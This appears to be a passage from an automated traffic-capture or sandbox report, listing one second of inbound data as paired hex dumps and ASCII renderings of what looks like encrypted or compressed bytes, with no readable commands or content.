2022-05-30 12:45:59 UTC	705	IN	Data Raw: 73 6b 95 65 e9 1c c1 ba b1 69 3a 1c cd 0b d1 09 7d 03 1c a2 76 09 b7 f4 f4 65 c2 cf e7 6c 82 f8 11 7f 68 9a 05 e4 53 d8 0d 6a 3f 1f ea 56 16 d6 0b 8f b1 48 85 22 6a 69 01 c1 59 be ad 7a 76 7f ac c9 a9 28 3b 5e 1c 4c b1 3b ed 2d 31 94 07 a5 41 26 3e 6a 63 5b 55 ca ee 53 e4 7e 7d 4b 29 aa 74 b4 72 73 fb 5a b1 e0 85 6f df be c5 cc 84 fd 0c 8c 14 8c ed 9c 5d 36 63 df 72 da 2e 47 bc de bc 9c 34 5f 7b 12 e3 8a 02 e8 82 8a 12 c6 fe 46 cc 2d b6 22 b7 f9 b0 c1 d6 78 75 2a 1b ff 31 d1 9f cd 3c be ae 03 11 e9 ce 1c 03 68 e8 f8 58 d8 f1 e3 ec f0 68 17 6d 3b 43 1c 0c 6d 62 b7 6b 10 22 f6 1b 83 71 cd 9a 15 17 1b dc 5e c0 5f 1d 53 fc 16 5a 84 b2 d7 9e ae e2 73 91 cd 5b 51 e4 7e c9 96 70 ea d2 de af 08 51 19 4c 6e ee 1e 83 5b 4c fb 47 f4 f4 d7 53 73 6f 9f e8 dd 7a 50 38 Data Ascii: skei:}velhSj?VH"jiYzv(;^L;-1A&>jc[US~}K)trsZo]6cr.G4_{F-"xu*1<hXhm;Cmbk"q^_SZs[Q~pQLn[LGSsozP8
2022-05-30 12:45:59 UTC	706	IN	Data Raw: f0 f3 67 2b 3b 09 da 67 d9 83 13 64 78 c5 f1 da 42 db d0 1a b3 18 e3 ea 64 5b d6 05 bf db 18 45 3a 03 07 3e ad f0 d9 8f 8d 99 b9 41 75 42 9a 59 b2 0c 36 1c b5 d3 d4 e8 04 10 93 cd 64 87 40 15 9e 7f f3 d8 d6 3f c2 d7 86 77 39 a2 e9 13 fd 26 77 60 33 61 22 76 11 fe 11 7f 39 bd ce 66 35 af db 87 6b 32 51 c4 f4 f2 93 fd 86 4f 82 98 1f 2a c3 50 1d 5a e2 6f 22 e2 91 85 da 05 ff 9c 0f 58 56 3e f4 15 f6 48 17 71 6e bd 75 a4 ec 65 c5 27 ba 9b d3 f4 a5 f2 c3 47 da 52 10 37 5a 9e 08 69 ce 4f b5 83 d2 4b b2 18 46 77 37 af 82 8b a9 8d ed 2a 91 17 3d 3f d0 99 16 b4 44 5c b7 f2 fc d2 6d 40 59 85 de a0 47 ec a9 ae 44 3e fe 5f 93 02 85 b9 78 39 c0 7c bb e4 6d 70 e4 dc d3 e6 8c 4d 5d ee 32 c7 80 7f bc d2 29 78 01 83 9e 3c b0 99 bc 09 52 b8 bc 53 f1 8e 5a ff 51 03 82 5f f6 Data Ascii: g+;gdxBd[E:>AuBY6d@?w9&w`3a"v9f5k2QOPZo"XV>Hqnue'GR7ZiOKFw7=?D\m@YGD>_x9\|mpM]2)x<RSZQ_
2022-05-30 12:45:59 UTC	707	IN	Data Raw: 9c 07 f7 e5 2b 4b 75 e5 e6 f3 17 6a cf aa 76 26 80 99 3f fc d8 21 91 c9 4c c6 1d 90 d8 ed 07 35 bc 9d de 4e 28 46 6f 8c 28 95 be b3 36 e3 62 ce 29 90 cf 2d 05 81 f7 10 d3 a9 23 d1 53 6d 94 ae 2f 6c 2c 82 76 de 74 bd 6b c7 99 aa b1 33 92 e3 59 c8 c3 ee 77 c2 f7 87 37 32 62 81 ce a1 bb b7 dd d2 7f b3 62 b8 ad b3 28 e0 7d 8c f9 32 d8 ff e2 69 26 87 4a 2d 12 fb 2e 70 1d 5f a4 0a 1b 56 e0 f7 20 3b 15 d7 b3 ec 82 fd 4f 2f dc e7 eb c2 06 85 27 08 74 6b 93 1f 79 34 63 ab fb 05 51 bf e6 9c 76 f4 13 53 59 42 36 74 d1 b3 ce ec 0c c0 19 57 84 39 d2 85 0d 85 1c ab fc e0 4a 3f 3b 96 99 e4 18 e0 50 62 70 d7 3c ba c6 8b ff 5e 8b f2 aa f0 01 22 db b9 dd fe 3b 2d 08 30 53 7c 07 20 03 41 d6 18 e5 e2 0e 38 65 dd 9b 12 4c 10 f3 5e 1a d7 dd cd cd 5f ed bc 9d 59 12 76 d2 c1 b6 Data Ascii: +Kujv&?!L5N(Fo(6b)-#Sm/l,vtk3Yw72bb(}2i&J-.p_V ;O/'tky4cQvSYB6tW9J?;Pbp<^";-0S\| A8eL^_Yv
2022-05-30 12:45:59 UTC	708	IN	Data Raw: aa 8a f1 df 0a fb dc 7b 69 62 97 55 e8 d8 ad fc 39 5f 96 97 f9 49 53 4f 8d dc 4f 44 03 34 09 7a ec 63 8a e6 1f 5a 67 83 ed f9 db 6c 68 e1 e0 eb 0f aa 48 b8 02 5c 73 b1 4d c5 48 66 04 3c 8d 98 50 33 8b 59 e8 4c a6 cd 33 ed b9 62 6a 29 22 49 f4 b9 7b 98 14 fe 0d d3 7d 48 a1 28 ee 27 32 48 81 87 07 e8 9f 79 60 84 50 de 10 98 4c c6 58 a9 0b 48 eb 5b 82 bc 68 5d f9 3e 71 93 10 80 7c 5c 73 0a 79 e0 85 80 91 6e 91 79 b0 1c 53 b6 15 27 bd 75 78 a9 ae 45 3d 54 09 22 01 0e 45 f6 37 4c ea e3 d8 db f1 a6 18 01 56 14 78 b0 d9 44 23 44 01 1b d6 44 56 9c 9f e8 ca 96 62 b6 5c fa f8 81 fe 73 a4 e1 5f 9b 88 12 f4 dd e2 4b b2 72 32 f3 7c f4 3d 97 4c fb bf 7f e2 75 8e 38 5d 39 70 66 18 c0 24 34 22 fb 25 1e 54 1d 54 21 c2 11 4c c0 f7 16 65 a4 7a 52 ad d7 b9 25 88 ff 93 a9 37 Data Ascii: {ibU9_ISOOD4zcZglhH\sMHf<P3YL3bj)"I{}H('2Hy`PLXH[h]>q\|\synyS'uxE=T"E7LVxD#DDVb\s_Kr2\|=Lu8]9pf$4"%TT!LezR%7
2022-05-30 12:45:59 UTC	710	IN	Data Raw: 30 0c 09 d5 f0 78 46 39 a7 e5 39 76 53 93 00 5f fa 98 9e c0 68 45 80 c6 e4 78 cf c5 4d 57 0d 6d 1e 29 59 0b 05 1e b0 79 a0 fc a2 e1 5d b4 1a 5a e4 bd 27 50 88 99 00 5b ba 9c e9 1b 97 24 f8 e1 19 63 95 be 48 c7 bd a8 a2 17 6a b1 2a d9 9e 92 77 c3 cc 48 7d 0b 0e 16 bd a0 98 37 92 da 71 b5 47 e9 b4 4d 10 ce 8c a9 f6 11 94 51 72 92 dc 71 94 89 39 ab f5 ca bc a2 04 42 f2 f8 5b f2 0c 9d cc 4a ff 1d df 64 9f ae 71 90 23 ac 9d 30 1b 8a 59 01 a2 77 04 b7 26 ea 69 aa fc 1f 2c 26 95 65 4c 97 6f b2 d4 b5 d4 09 7c ea 4b 6c ea 3e 7e d1 41 ea 68 6f c0 df a7 ed fe e0 41 15 4e 8f 89 ec 4b 02 e5 0a b7 f9 07 b8 ea 14 b2 a0 cc a3 30 4a 95 57 09 01 e4 95 12 b9 20 5e bb ac 7e 3d c0 51 9f ba 8a 15 ca 1e 06 53 42 05 c3 f3 0d aa 16 e1 2c a1 aa 67 7c 92 9c b2 5a 80 02 b0 9e ad 35 Data Ascii: 0xF99vS_hExMWm)Yy]Z'P[$cHj*wH}7qGMQrq9B[Jdq#0Yw&i,&eLo\|Kl>~AhoANK0JW ^~=QSB,g\|Z5
2022-05-30 12:45:59 UTC	711	IN	Data Raw: 0f 25 26 24 42 9d 03 eb b2 86 e8 3f 60 f5 61 6b 0f 65 c6 b7 cc c4 97 c8 65 c4 38 2b 38 a0 c2 55 e2 de a8 fa d3 12 1c 30 98 98 b1 3f 00 ea e8 26 50 01 7f 83 f0 ab d0 e6 23 a5 7e 76 b1 e2 68 d7 2c fe 9f a5 ec 81 25 fe e0 f1 2b e2 be bb 72 26 0e 84 94 6c 11 e7 48 3e a5 73 75 32 89 b9 63 8a e0 15 9b 2d 32 89 87 f8 e3 0e bb f2 c0 11 57 7d 8f 28 82 ab f9 ef 67 3f 13 e9 7f b1 b6 52 29 10 bd b1 a5 ce 5d a8 d1 81 0a f1 92 7c cc bd f3 6b aa 13 23 ad 44 cc 63 d5 bc a8 81 f8 a9 1d 9c 25 6c 5a 87 52 e7 a3 11 88 c4 67 95 0c 08 df 92 9c 41 b5 58 ed c8 66 27 f2 10 55 62 8d 9a e3 9c 62 9e c9 fa cb 13 95 3a f1 14 bf 92 ad 7a 98 81 6d c5 42 35 c7 b1 07 07 e3 5c bb 1a e1 a1 5e f3 2b 54 67 33 9b f5 32 59 68 80 0c 30 22 f5 2a 0f 70 78 43 9f 91 58 fd 16 9b d8 bf f2 3d 47 f2 19 Data Ascii: %&$B?`akee8+8U0?&P#~vh,%+r&lH>su2c-2W}(g?R)]\|k#Dc%lZRgAXf'Ubb:zmB5\^+Tg32Yh0"*pxCX=G
2022-05-30 12:45:59 UTC	712	IN	Data Raw: 5b f4 bc 5c 32 cc c3 44 3d a5 93 77 3d ce 6b 3c 58 6e 0d a1 95 a1 6e 56 6a e4 8e 4e 57 97 e4 00 94 98 f8 d7 87 47 97 fd 98 4c fe d3 6b f4 fd 17 97 bd a8 c4 1b 56 a1 37 65 d6 c9 fb 9c 7b 8f cc 96 11 29 6e df 99 86 39 eb 97 b4 e9 dd 42 8a e7 1b e0 bb 29 e6 9b c6 b1 d5 4d 09 41 f6 9d 74 0e e4 90 20 d1 01 aa bb 23 bc 19 48 a6 84 97 d4 82 bb e3 1f 25 eb 86 c4 03 8f a2 01 07 02 6a 97 5b 10 57 64 2e 67 bc 7e 36 a0 c5 69 90 ce f3 61 b2 97 e6 8f da 71 4b 9f 39 44 25 03 da 3e ac 2b d7 c9 b2 8c 33 e8 df 06 24 2f f3 97 b5 de 82 ac 8a cb 4f d9 b0 77 8e 14 8c 32 cf 42 ca ef 48 86 88 79 2c e8 9e 2e 95 46 0d 15 8d 06 57 8e 1b 36 ab 81 2d b3 25 3d ac 36 ea 56 2f a7 31 b0 b5 10 df 75 16 27 ab 8c a4 7b 53 ee ff 8f 14 f7 ff f8 e0 3c af 74 92 bc 65 ea 01 5f e1 86 0a 4a 12 c4 Data Ascii: [\2D=w=k<XnnVjNWGLkV7e{)n9B)MAt #H%j[Wd.g~6iaqK9D%>+3$/Ow2BHy,.FW6-%=6V/1u'{S<te_J
2022-05-30 12:45:59 UTC	713	IN	Data Raw: 17 ca 5e 53 fe 5d 3e 3b c5 72 cd 57 11 28 75 c1 62 9f c0 1b 19 37 2e f0 12 ae ba 80 08 3e ea c0 f7 9f 8a 3e 66 a5 b0 94 da f2 9a a1 91 94 76 33 aa a0 f5 3a 39 97 35 f5 b9 2c 78 4f d6 f4 43 2a 42 ad 2d 04 32 9d 14 d5 6f 73 a1 4d 75 97 8a f0 bd 62 e7 f4 a1 69 57 44 0e ec e3 50 02 b3 10 47 2e 57 c0 b3 06 81 df 27 61 1d ce bc 2c b1 e2 be f1 43 a5 29 12 10 e3 0f 96 04 f7 14 c8 66 76 61 40 11 05 f7 f1 9d e3 45 c5 24 a5 3e ba 81 3f 2c 23 36 55 e1 c2 44 32 0b eb 00 87 aa 86 29 37 e7 3f 9a c2 72 53 9c 48 c4 12 bf d7 87 f0 33 e8 e4 46 9b 8b df 8c aa b5 46 48 9c 10 ca 18 98 81 91 29 f1 dc 69 7f fb f9 de 79 d3 07 64 ee 67 fe 57 06 4b 6c 11 42 dd 1c 8c e5 a7 04 3e b2 f8 fc 94 a3 06 29 bd bc ac 91 76 b7 4a 67 b4 b3 ee ba 44 93 e9 fe ad 8d 2d 5d 20 09 76 1b d4 32 7c 75 Data Ascii: ^S]>;rW(ub7.>>fv3:95,xOC*B-2osMubiWDPG.W'a,C)fva@E$>?,#6UD2)7?rSH3FFH)iydgWKlB>)vJgD-] v2\|u
2022-05-30 12:45:59 UTC	715	IN	Data Raw: b3 07 91 ae d8 d4 64 d1 1d 3d 98 8a 44 d1 6d d9 66 94 3c b8 fa 2f 37 69 2d 20 11 17 b9 ec 12 16 d9 8f 47 fc d0 54 49 2f f2 b4 a3 a0 b6 22 47 ff 04 02 dc a7 8f 7f 12 d0 1a 1d db e7 1e 4a ee a1 ce 29 6d 29 d8 dd b7 93 ce 33 02 41 ea 23 e7 0a 15 bb 6d 53 0b 28 34 c7 44 20 f8 bd 9d 93 d0 4b 1b 6f 48 34 30 3b 1f a9 b0 7d 53 ab 4f 56 bf 2a 9c 81 9d 52 d2 75 cc e5 76 65 98 d5 92 3b b1 cd cb c0 d3 e9 39 30 79 9c 42 00 05 cc e8 65 b9 22 5a 95 8d f4 75 0c 20 97 45 5a 49 4d 0b aa 90 b0 53 87 56 43 93 7f f3 51 03 c1 a3 51 e7 61 40 60 e5 13 f5 15 83 e9 4f 2f c5 49 75 48 ed 80 c6 1b 7b f1 c5 4d 16 59 63 10 0d a7 43 00 e1 4f f0 80 db e3 6e 67 43 64 db 5a b5 e7 93 11 38 45 cb ef 54 17 7b 69 41 ec 10 48 35 28 ad a1 76 c2 01 d4 39 46 c6 61 01 55 89 57 cf 52 10 ff 6c 47 0d Data Ascii: d=Dmf</7i- GTI/"GJ)m)3A#mS(4D KoH40;}SOV*Ruve;90yBe"Zu EZIMSVCQQa@`O/IuH{MYcCOngCdZ8ET{iAH5(v9FaUWRlG
2022-05-30 12:45:59 UTC	715	IN	Data Raw: df 3c a6 eb 95 7a d2 ca 47 27 8b 61 cb b3 3f da 56 af f4 68 68 4d 8d d7 85 26 5d 1f 82 c0 80 2c 9f b3 67 cf 35 9c 3d ae 92 2c b0 32 8c 4f 61 b4 94 e5 d2 2c 49 2e c8 68 d9 2d 20 29 9c e9 fc 98 16 b9 73 b3 87 ef 69 0c af 0f fb 5d 00 ae f0 bc 79 df f9 8a 2c fd 96 fd d4 9a 1d d9 63 dd 08 9b 10 00 64 6d 0d 83 8c c2 cf 0c 33 c9 f8 cf a6 92 e3 22 83 be ac 50 78 02 f3 89 68 8c 04 de 7b 8a e7 58 6f bd c3 63 b1 99 98 b5 4c 55 15 18 5d 30 96 12 40 df 42 a7 89 38 88 ae 9a e3 d2 e7 28 32 05 34 76 49 7f f5 14 72 02 b9 0d 30 0d b7 3b 7b ce 38 ce 0b 3a 98 78 3c 1a 04 72 f1 e4 6c ad 90 cc 58 fb fe e9 97 f4 b2 cc d6 b9 d6 86 ba a0 43 a0 9c 17 f5 1a bb 14 c6 70 1e 20 7a a1 df aa b2 ee 80 ac e2 aa b8 89 10 21 a2 8c 32 bb 0a b4 f2 87 d3 eb d6 93 be 9c 70 27 72 e9 53 6d 55 e8 Data Ascii: <zG'a?VhhM&],g5=,2Oa,I.h- )si]y,cdm3"Pxh{XocLU]0@B8(24vIr0;{8:x<rlXCp z!2p'rSmU
2022-05-30 12:45:59 UTC	717	IN	Data Raw: fc a4 88 af 80 28 a0 f2 15 df 67 f4 fd fc 82 ba 02 bb 4f 65 7a 34 78 f1 dd be 88 1d b6 a9 eb 9f 54 ae d9 5e c7 63 e7 ac 03 e9 50 03 9a 7b 18 97 fb ee d4 cd 2e fe 0b 4c ca 43 4c 34 a6 67 75 b7 6c d7 b5 65 30 ed 00 d4 43 18 c2 4e 88 79 df 9c f8 6f 93 a6 c5 8a 38 21 fd 5f 7d 04 0b 18 e7 af 25 78 69 ec 25 69 fe cd 74 8e 78 c9 e2 c1 2c cd 19 b5 02 49 84 ff 47 cd 02 ae 93 d7 90 a3 b2 1c c1 33 31 a6 26 a7 d6 27 95 44 5f 08 e9 9a c5 ec 44 75 4a fd 60 db 6a 16 42 9f dd a1 ef 3c e8 66 0f 0d 9a 9e cd 3e fc d1 b0 81 1f cd 3b c8 f9 72 38 c9 5d 3b a9 6c 3d 2b a0 45 8d dd 31 5d f9 52 db 0e f1 ef d7 28 f4 95 b3 e3 26 1d c9 f4 8c 9e 99 06 b6 54 13 65 eb 22 0f 4e 73 34 4a 3b c2 a8 2c ce 1a 47 ff ac c2 f4 05 f2 6d b4 c0 c7 c4 1f 6e 90 02 cf 69 6a ad 36 e8 06 a9 59 91 42 77 Data Ascii: (gOez4xT^cP{.LCL4gule0CNyo8!_}%xi%itx,IG31&'D_DuJ`jB<f>;r8];l=+E1]R(&Te"Ns4J;,Gmnij6YBw
2022-05-30 12:45:59 UTC	718	IN	Data Raw: cf 9b c5 f0 3b 94 ba a3 99 6f 79 77 ff 33 20 53 d6 bc fb 24 3e bf 8c 99 fa 33 71 ff 87 23 bb 85 dd d8 c5 4d 91 a8 5d 95 2d 29 3c 67 75 39 14 3c ee 70 61 f7 02 44 11 4d 34 61 32 c7 01 e4 b4 6c e1 ea df e9 94 ee 27 f4 b7 7a 59 47 52 68 b9 06 b2 26 9d fc 69 a9 1c 02 78 1c 3c 34 01 6e a6 d9 3b 07 b8 96 83 b7 8f a0 40 20 4a 95 75 9c 02 bc 64 3d 4e 1a b5 cc c6 e7 3d 55 b8 92 da d3 02 6d 3d c1 f2 f9 cc ad d8 f3 df 0a 3a 85 f4 8d f8 c3 0f a3 c4 f8 f7 07 48 19 14 ac 12 25 76 10 0b 9d 98 c3 c3 da f9 59 b4 34 b7 64 2e 1b 75 78 2b d2 e2 9c 5a eb ff 98 ea 89 25 b1 34 58 5a 6d a5 85 18 33 bb 95 bf 07 de cc ad 81 37 81 3d 7b 5c 9e 7d d7 14 56 be 48 62 e7 f6 aa f6 06 ce a1 d9 9f 75 17 71 cc c3 6d db f8 fc 62 c8 40 0b 56 0a 6c 6b d9 78 8c 01 cf 32 63 a1 4f 83 7c 4a d5 7b Data Ascii: ;oyw3 S$>3q#M]-)<gu9<paDM4a2l'zYGRh&ix<4n;@ Jud=N=Um=:H%vY4d.ux+Z%4XZm37={\}VHbuqmb@Vlkx2cO\|J{
2022-05-30 12:45:59 UTC	719	IN	Data Raw: f2 b8 65 57 47 8b e5 c5 bf a0 0f 19 7b f0 12 2e 57 20 08 c5 42 d4 9f dd ac ea 10 c7 92 3b c9 a2 a8 54 7f 83 fd 58 b3 b0 04 ec a1 a8 e0 a7 dd fa cb 63 0d d0 d8 3f fb ab 47 8d 9b 6f 4d aa bb 90 c9 06 ec 3f 9c 10 f3 f6 10 d1 c2 a8 4c 2c cd 36 ef 5a dd 23 96 c0 89 13 18 ea d1 c1 44 2d 64 cf 9b 75 e2 b4 a4 3d ad 5f 0b c3 00 4f 5a 35 c7 1e ff 4e 4a 5f 66 7f a2 f5 a1 0c 48 13 4f b0 5f 50 7e 15 96 24 5b d9 29 ea a9 71 d3 88 b3 6d 1a 65 7e ac e5 df 9e 42 34 b9 06 81 b4 8f 71 a2 3f 87 ad a3 36 50 29 aa 55 25 f6 a3 78 8b b8 b3 d0 eb d0 4f f6 35 5d 0a b3 e5 5a 11 6a c8 d1 23 23 ff e6 4f 56 4a 48 11 be 85 dc a2 00 c7 8b 55 e4 2c 6e 7f 71 55 91 43 cd 5a 08 fd 30 47 8f bc a9 29 06 19 39 43 33 c1 02 77 fc e6 06 19 1d ae 5d 1d 17 40 9f db 90 1e f7 71 a4 71 6b c6 28 83 f1 Data Ascii: eWG{.W B;TXc?GoM?L,6Z#D-du=_OZ5NJ_fHO_P~$[)qme~B4q?6P)U%xO5]Zj##OVJHU,nqUCZ0G)9C3w]@qqk(
2022-05-30 12:45:59 UTC	721	IN	Data Raw: dd bc 9a 0a 68 44 d8 a1 2c 81 83 3f 23 e0 7d 18 83 0d 31 38 22 05 07 89 7d 77 a4 64 dc 64 11 68 63 6d 1d ff 0c ce 8b 37 82 69 45 b5 e8 5b bd 3c 50 d6 b3 cf cd 89 af 95 ef b6 c5 55 e1 cb 24 1e 6c 26 b1 52 e7 9a 29 95 b9 16 65 c5 ec 6e e8 a3 c2 60 88 00 5f 6a 4b 67 49 c0 5b 15 b3 23 f5 11 0f 85 ab 14 d0 c5 8d 7b f7 0a df 4c b8 fb 79 b7 2a a1 db c9 c7 d2 5c 0e 4f e4 d9 75 31 4c 77 41 2f ab 17 93 fd 82 60 de 9c ae 59 f0 99 c5 b2 7b 67 ea c9 15 6b d1 0b 77 ff 0a 33 94 c8 c8 49 15 47 30 08 c3 81 84 3f 06 8f 68 d7 95 fe b4 a5 8c 94 46 61 f4 b5 f9 75 56 8e fa d4 8e 69 c8 d9 eb 51 d2 d5 e9 e8 e3 f8 66 b5 ef 85 a8 16 f4 60 d4 f6 3f f8 4b 4f 67 ac 94 19 b6 bf c6 c5 54 a4 82 28 21 9a 8e 74 3e 1b f4 6e a2 84 48 d1 a3 ca 47 39 ce 5c 97 b6 32 4e 3f 79 07 a8 b3 e4 74 81 Data Ascii: hD,?#}18"}wddhcm7iE[<PU$l&R)en`_jKgI[#{Ly*\Ou1LwA/`Y{gkw3IG0?hFauViQf`?KOgT(!t>nHG9\2N?yt
2022-05-30 12:45:59 UTC	722	IN	Data Raw: b7 a1 33 16 69 42 83 6b af 69 bb cd 37 d1 31 61 7f ad 4e 15 88 b7 c4 7f 3d 5f 6f 37 a7 4f f9 c7 6d 67 c4 0b 61 36 ab b2 e1 70 13 eb b5 fb e1 f6 8f ba b7 46 02 ca 55 ac c3 32 82 76 df 3e 7a 97 c9 b6 2e 1d 3b ab 08 38 d8 8b e5 ba 71 d9 a3 5d a5 88 39 f5 96 b9 49 77 54 05 3f 37 49 49 12 3c bf 66 12 30 2c 3a a5 f7 e6 39 ea 8d cf 8c 9c 5a f7 9f c9 62 d1 1c 41 d7 26 4d 15 6b ab 4c 09 4a 41 23 19 07 ba 2f b2 bc 4e 32 cc 12 44 09 85 93 dd 35 ea c5 54 be 14 f7 07 24 a7 5e a2 14 57 0d 40 f2 91 e6 bc cf ed bf 4c 01 ea b7 95 22 47 b0 96 87 79 b8 e7 2c 38 a7 1a 0d b1 2a 66 7b 65 85 00 67 22 d6 32 7b cd 14 e5 24 cc 0d a3 1c d9 23 16 ac 5e 75 e5 07 af cf d6 28 b8 3e 01 ce 41 f6 bd bb 89 24 5e db 1b b9 98 58 0b 28 25 cc 48 c7 4a 7b 0a 2b 7e ce ff 6b 15 0f ca b0 9e c7 d7 Data Ascii: 3iBki71aN=_o7Omga6pFU2v>z.;8q]9IwT?7II<f0,:9ZbA&MkLJA#/N2D5T$^W@L"Gy,8*f{eg"2{$#^u(>A$^X(%HJ{+~k
2022-05-30 12:45:59 UTC	723	IN	Data Raw: 09 15 66 f1 1b 5d 9d 6c 2c 10 fa d1 a3 95 3a da 0c 96 f2 9e c8 24 ea 18 0d f2 8e 41 96 95 4c 05 7e 80 47 92 7a 96 e4 b3 df 46 35 52 58 2c 82 82 e4 0d 30 ba a5 2a ca 2a 87 6f 33 9b 4b 64 74 8d f4 8e d4 d8 06 5f 1e 13 b2 7c 9f 1a 79 7f 0a 1a e3 fd b0 34 f0 f9 d8 ed b3 06 dd 48 fd c5 6f 90 ee 28 aa 9f 7c 71 c3 5b a4 76 53 07 e5 56 1b 81 e5 47 d7 be 78 5a 54 e3 3f 44 43 49 9e c0 4c 1c 3c 4c ac ca b6 fc ca f2 5c 01 a2 3e eb 13 c3 ba 99 c3 fc 06 00 fd 9f 3f d3 e7 bc ac ea 3a 79 d9 8e ef 4a f9 12 39 d6 15 fa 76 7d 7e 80 d8 2a 16 2a d4 80 74 6b 28 8b d7 b4 46 40 c2 32 f4 56 58 c3 af 81 96 a0 43 67 ec d0 c5 75 f3 2c 5a 1e 2a 33 5d 2d 8b ef 03 9d f6 27 89 58 03 cf df 26 a7 79 bb c1 6f bf 42 3a 78 05 53 7c 61 ee ac 08 c9 bc 55 b7 98 eb da 44 e3 83 66 77 69 cb db 6d Data Ascii: f]l,:$AL~GzF5RX,0o3Kdt_\|y4Ho(\|q[vSVGxZT?DCIL<L\>?:yJ9v}~tk(F@2VXCgu,Z*3]-'X&yoB:xS\|aUDfwim
2022-05-30 12:45:59 UTC	724	IN	Data Raw: d1 21 9b 42 12 08 a8 dd cc 51 59 cd a5 76 1d 70 eb 24 22 8d 56 c2 f5 44 3c 0d e5 a2 ef bd 97 55 5e 65 3a 9a 89 46 e3 20 7e 78 bb 01 49 e2 f2 49 ef 4c e3 4d 06 f9 f3 15 75 0d 2f 03 89 78 55 a4 82 b9 d4 33 89 8b c8 e0 e7 43 f7 72 b8 54 2f 1e 75 8d 04 fd 64 75 32 36 a8 43 e3 47 86 f9 d4 ca 8c f5 ee e5 1e f9 17 c4 46 fe a2 44 97 79 8b 84 f0 f5 88 75 77 1c 95 ad 9c 01 8b a5 7e 66 b1 49 fb 28 d3 60 14 7b 65 c4 d1 9d ec e1 91 e5 3f 73 8d cf de 7f 92 ef 75 03 57 f3 10 80 fe 5b 8a 0a 15 82 00 13 12 c4 c9 be 3e 10 d2 89 ac 84 06 ac df 8c 3a 91 78 20 01 1b e2 f4 c0 42 d4 1a 96 9c e0 10 48 19 d7 7c 4e ae f8 f6 88 ff 5b 8b b8 17 e8 40 38 af b3 56 30 3b c1 00 2c 00 f5 c6 ab c5 f4 47 c5 2e 02 d3 b5 bd c8 9f a2 9b e0 78 38 30 47 c3 2b 0a af 3a 49 96 d6 14 9d d0 f2 1c 67 Data Ascii: !BQYvp$"VD<U^e:F ~xIILMu/xU3CrT/udu26CGFDyuw~fI(`{e?suW[>:x BH\|N[@8V0;,G.x80G+:Ig
2022-05-30 12:45:59 UTC	726	IN	Data Raw: 50 0d 54 f4 e8 20 7f 35 4c 98 01 9e 38 b4 eb 85 10 e2 aa a0 8d 26 07 4a c3 e1 81 fd 48 19 41 10 3a d8 3a e7 66 2a 88 9b 4b 72 07 ec e0 60 1d f0 79 65 11 e2 a1 8c c3 8c 44 40 93 e0 f5 28 d1 7e bf 78 1f 53 fd cb 44 dd fa a5 4e d1 93 48 a0 7c b3 8f 1b 57 d7 b7 c3 2a 1b 0d 10 57 26 0b f2 96 6f a9 9a 25 0e f4 60 17 6b 18 67 38 64 27 3e ad 97 17 2c 3b 57 2f c8 34 7b 34 c3 10 23 07 cb 93 be f0 9f 90 5e 28 c7 20 06 1e e2 ac f4 00 60 22 28 d5 1f 7b 62 49 92 35 35 3c 3b 30 f6 c8 3a 24 d5 fe 21 5d 16 fe 01 56 60 f8 2f 2e 8c e6 bd 2e 0f fc bd a3 ad 74 96 49 3f c2 b1 e4 15 6d 02 11 6b ae dc d7 35 76 ed 2f ac 3f f2 b1 fb c9 f3 c0 89 d9 20 b2 04 5c fd 8d 4b 75 4c b0 fa f7 89 d8 3a bc bd 2f 1f d5 e1 ab af f1 4a b7 cd 92 28 ca a1 9b f7 95 bd b6 4b fd e9 ce 08 f1 40 a2 5e Data Ascii: PT 5L8&JHA::fKr`yeD@(~xSDNH\|WW&o%`kg8d'>,;W/4{4#^( `"({bI55<;0:$!]V`/..tI?mk5v/? \KuL:/J(K@^
2022-05-30 12:45:59 UTC	727	IN	Data Raw: 22 78 c8 f0 04 87 c6 5d e5 13 86 2c e6 ed 7d 25 f9 4e 8c 69 68 49 b3 24 8e 01 be 71 9c 3a 6b 32 4d 92 ad de c3 ec 5d ce 5c bd e7 67 df bb ec a2 b2 13 93 fe 45 1d 4f 5d ca 16 73 63 dd 30 d1 47 b1 b5 4f 22 38 52 ff 5d 67 62 a7 7c ce 23 28 fc 02 28 30 52 cd 84 e9 c8 ae 51 6b 65 3e fa a5 4b f9 b4 6f 4b 8a 37 4a e2 1e 6b ae 8d 6d aa d5 b0 ed 47 1d 50 78 3f 03 54 cb 9e dc a9 b9 26 11 76 f2 84 54 6c a9 c4 46 c1 e9 07 7e 96 76 03 49 56 33 83 fe 31 06 c8 63 1c a6 cf 36 56 9d 96 cd 1e 04 fb fa 2d 45 e8 2b 83 9e bc 09 f5 41 db 59 47 64 3b eb 20 b3 7e 3e fc 69 9b 5f 61 a8 f4 f4 3c d8 8e cb 66 cb 7d da eb 94 3b 5d fc fb 07 6e 47 dd bc af bd a8 ec cd f2 b6 2a f7 7f 3d 55 9e 01 ea 46 25 4b 73 f9 37 16 23 b6 ed e5 03 07 25 51 91 be cf 55 5d a1 94 59 dd 1f 3b c2 b5 54 ee Data Ascii: "x],}%NihI$q:k2M]\gEO]sc0GO"8R]gb\|#((0RQke>KoK7JkmGPx?T&vTlF~vIV31c6V-E+AYGd; ~>i_a<f};]nG*=UF%Ks7#%QU]Y;T
2022-05-30 12:45:59 UTC	728	IN	Data Raw: 26 de 9f b7 6b f0 67 82 79 d0 3b 2f 4c 9e 7c 4b 8c 9b 74 1e b8 a7 bf 89 c0 2b da 2d c8 16 b1 ab 6e 86 3e a5 92 95 9d 59 14 cc 27 59 38 c5 ea 46 cf 22 ff a1 6b 35 1d 34 76 04 6e 59 46 db ad 25 4c 98 75 e9 41 e6 50 3c 27 13 58 c1 8d 72 30 e0 6d b3 6c 94 3c b9 cc 55 9f fe a7 d7 06 b6 ff fc 98 9d 14 25 fd 78 ef 6b 24 b6 f3 b4 a3 dc 34 36 7b f2 31 ee 34 dd 2e c1 42 5f 6f 0d b3 ea 73 c0 34 5e 31 fb e8 d9 67 c3 75 1e 44 b8 bd ad 22 cf 46 7b 0f bb 33 6e 88 5c 73 1a a6 10 88 04 de 18 e5 9a 99 87 3e 25 72 4e 88 ef 86 75 27 41 1d 9c 0b a7 42 36 8c de 90 d8 d0 0d 03 6d f4 1e e7 3e 32 5c cb eb 18 45 1f 97 02 87 52 c3 0b f3 bd ee 55 9b 69 ef 7e bb f4 0c 05 52 cc 1f 5d 8f a6 ad 6f be de 80 ef 95 af fc b6 d8 37 f9 d5 1a 0b c9 83 60 60 d3 02 70 c5 83 22 f2 98 46 06 ad 15 Data Ascii: &kgy;/L\|Kt+-n>Y'Y8F"k54vnYF%LuAP<'Xr0ml<U%xk$46{14.B_os4^1guD"F{3n\s>%rNu'AB6m>2\ERUi~R]o7``p"F
